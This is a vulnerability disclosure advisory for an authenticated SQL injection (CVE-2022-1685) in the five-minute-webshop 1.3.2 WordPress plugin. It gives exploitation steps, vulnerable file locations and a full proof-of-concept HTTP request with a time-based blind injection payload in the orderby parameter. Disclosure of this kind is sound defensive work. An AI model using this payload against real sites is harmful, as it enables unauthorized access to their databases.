(1/2) five-minute-webshop 1.3.2 WordPress plugin SQL injection

Vulnerability Metadata


Key Value
Date of Disclosure May 09 2022
Affected Software five-minute-webshop
Affected Software Type WordPress plugin
Version 1.3.2
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-1685
CVSS 3.x Base Score 4.9
CVSS 2.0 Base Score 4.0
Reporter Daniel Krohmer, Shi Chen
Reporter Contact daniel.krohmer@iese.fraunhofer.de
Link to Affected Software https://wordpress.org/plugins/five-minute-webshop
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-1685

Vulnerability Description


The orderby query parameter in five-minute-webshop 1.3.2 is vulnerable to SQL injection in three different code sections. An authenticated attacker may abuse the Manage Products functionality of the plugin to craft a malicious GET request.

Exploitation Guide


Login as admin user. This attack requires at least admin privileges

five-minute-webshop_1_step-1.png

Go to Five Minute Webshop and then hit Manage products

five-minute-webshop_1_step-2.png

Clicking the previous button already triggers the vulnerable request. orderby is the vulnerable query parameter.

five-minute-webshop_1_step-3.png

A POC may look like the following request:

five-minute-webshop_1_step-4.png

In the code, the vulnerability is triggered by unsanitized user input of id at line 38 in ./includes/components/class-wp-sb-list-table-products.php. The final database query is called at line 58.

five-minute-webshop_1_step-5.png

The exploit also applies for ./includes/components/class-wp-sb-list-table-coupons.php and ./includes/components/class-wp-sb-list-table-orders.php since the database calls are used identically here. Example:

five-minute-webshop_1_step-6.png

Exploit Payload


Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the request below.

GET /wp-admin/admin.php?page=fmwes_products&orderby=id+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/admin.php?page=fmwes_products
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651745631%7COV2XERpVFeC6SsbO6tVelcjlu3eSstE3PBYGLacRcwK%7C50356ad1081eb95fdc26e9b5fd9ebe0ee3dd0d15770ed53b35169187987b9b0f; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651745631%7COV2XERpVFeC6SsbO6tVelcjlu3eSstE3PBYGLacRcwK%7C35253b322f0667a47e2db7f72abbf9e67d1934567168341789ac615473a65872; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651572831
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1